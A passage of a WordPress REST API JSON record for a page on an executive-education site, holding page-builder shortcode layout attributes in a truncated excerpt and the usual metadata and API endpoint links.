full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-7632","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/7632","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/comments?post=7632"}],"version-history":[{"count":0,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/7632\/revisions"}],"wp:attachment":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/media?parent=7632"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}